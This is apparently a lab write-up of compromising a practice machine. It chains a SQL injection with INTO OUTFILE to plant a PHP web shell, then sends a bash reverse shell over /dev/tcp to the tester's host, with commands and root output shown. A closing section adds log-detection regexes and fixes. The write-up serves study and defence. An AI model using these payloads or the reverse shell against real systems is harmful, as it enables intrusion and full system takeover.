RCE via SQL Injection
After confirming the SQL injection in the priority parameter of the hidden endpoint /issue/checkByPriority on the web application on target port 17445, it was verified that the injection can be used to write a file to disk. This was demonstrated by using the injection to write a file to a known, web-accessible location. That location was taken from the phpinfo.php page exposed by the web application on target port 30455: phpinfo discloses the value of $_SERVER['DOCUMENT_ROOT'], which reveals the directory the web server serves files from and therefore where a written file can be reached over HTTP.
Issue
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hawat]
└─$ curl -X POST -s http://$IP:17445/issue/checkByPriority?priority -b 'JSESSIONID=A57CBCFA081BD958DB8F4ECB30E0C7C3' --data-urlencode "priority=' UNION SELECT '<?php system($_GET['cmd']); ?>' INTO OUTFILE '/srv/http/webshell.php' -- //"
zsh: bad math expression: operand expected at `'cmd''
Due to the way the shell environment handles quotation characters and variables, I cannot just copy and paste the PHP one-liner web shell.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hawat]
└─$ curl -x http://localhost:8080 -X POST -s http://$IP:17445/issue/checkByPriority?priority -b 'JSESSIONID=A57CBCFA081BD958DB8F4ECB30E0C7C3' --data-urlencode "priority=' UNION SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/srv/http/webshell.php' -- //"
Wrapping cmd in double quotes (") still fails: inside the double-quoted --data-urlencode argument the shell still treats $_GET["cmd"] as a variable to expand, so the payload never reaches the server intact.
Workaround
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hawat]
└─$ curl -x http://localhost:8080 -X POST -s http://$IP:17445/issue/checkByPriority?priority -b 'JSESSIONID=1B9C4A90EC6859CD2B19F2CFC84AAFFE' --data-urlencode "priority=' UNION SELECT '<?php system(\$_GET["cmd"]); ?>' INTO OUTFILE '/srv/http/webshell.php' -- //"
To avoid the error, the $ character must be escaped as \$ so that the shell passes it through literally instead of expanding it.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hawat]
└─$ curl http://$IP:30455/webshell.php?cmd=id
uid=0(root) gid=0(root) groups=0(root)
Code execution confirmed; the web server process itself is running as root (uid=0).
Exploitation
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hawat]
└─$ curl http://$IP:30455/webshell.php?cmd=bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.45.218%2F50080%200%3E%261
Sending a URL-encoded bash reverse shell through the web shell's cmd parameter.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hawat]
└─$ nnc 50080
listening on [any] 50080 ...
connect to [192.168.45.218] from (UNKNOWN) [192.168.162.147] 39886
bash: cannot set terminal process group (291): Inappropriate ioctl for device
bash: no job control in this shell
[root@hawat http]# whoami
whoami
root
[root@hawat http]# hostname
hostname
bash: hostname: command not found
[root@hawat http]# cat /etc/hostname
cat /etc/hostname
hawat
[root@hawat http]# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:9e:80:47 brd ff:ff:ff:ff:ff:ff
altname enp3s0
inet 192.168.162.147/24 brd 192.168.162.255 scope global ens160
valid_lft forever preferred_lft forever
inet6 fe80::250:56ff:fe9e:8047/64 scope link
valid_lft forever preferred_lft forever
Initial foothold established on the target system as the root account via RCE through SQL injection.
System-level compromise.
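As an added, defender-side example that is not part of this write-up: the chain above leaves two artefacts in logs, a database query using INTO OUTFILE and web requests whose percent-encoded cmd parameter decodes to shell syntax (the reverse shell above). The log lines below are constructed, the general-log format is assumed (INTO OUTFILE is MySQL/MariaDB syntax), and the detection patterns are illustrative rather than exhaustive.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed MySQL/MariaDB general query log excerpt (assumed layout: time, thread id, command, argument).
MYSQL_GENERAL_LOG = """\
2024-01-01T10:00:01Z   12 Query   SELECT id, title FROM issue WHERE priority = 'high'
2024-01-01T10:00:05Z   12 Query   SELECT id, title FROM issue WHERE priority = '' UNION SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/srv/http/webshell.php' -- //'
"""

# Constructed web server access log excerpt (combined log format).
ACCESS_LOG = """\
192.168.45.218 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php HTTP/1.1" 200 512
192.168.45.218 - - [01/Jan/2024:10:01:07 +0000] "GET /webshell.php?cmd=id HTTP/1.1" 200 54
192.168.45.218 - - [01/Jan/2024:10:01:30 +0000] "GET /webshell.php?cmd=bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.45.218%2F50080%200%3E%261 HTTP/1.1" 200 0
"""

# A query that writes its result set to the filesystem is a red flag from an application account.
FILE_WRITE_RE = re.compile(r"\bINTO\s+(?:OUTFILE|DUMPFILE)\b", re.IGNORECASE)
# Shell syntax that has no legitimate place in a web parameter value (deliberately narrow: "cmd=id" is not flagged).
SHELL_RE = re.compile(r"/dev/tcp/|/bin/(?:ba)?sh\b|[;|`]|\$\(|>&")
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def find_sql_file_writes(log_text):
    """Return general-log lines containing INTO OUTFILE / INTO DUMPFILE."""
    return [line for line in log_text.splitlines() if FILE_WRITE_RE.search(line)]


def find_shell_in_query(log_text):
    """Return (path, parameter, decoded value) for requests whose query string
    carries shell syntax once percent-encoding is undone."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        # parse_qs percent-decodes values, so %2Fdev%2Ftcp%2F becomes /dev/tcp/
        for name, values in parse_qs(url.query, keep_blank_values=True).items():
            for value in values:
                if SHELL_RE.search(value):
                    hits.append((url.path, name, value))
    return hits


if __name__ == "__main__":
    for line in find_sql_file_writes(MYSQL_GENERAL_LOG):
        print("SQL file write:", line)
    for path, name, value in find_shell_in_query(ACCESS_LOG):
        print(f"shell syntax in {path} parameter {name!r}: {value}")
```

The durable fix on the port 17445 application is a parameterised query for priority; on the database side, a restrictive secure_file_priv and withholding the FILE privilege from the application's account stop the OUTFILE write even when an injection exists.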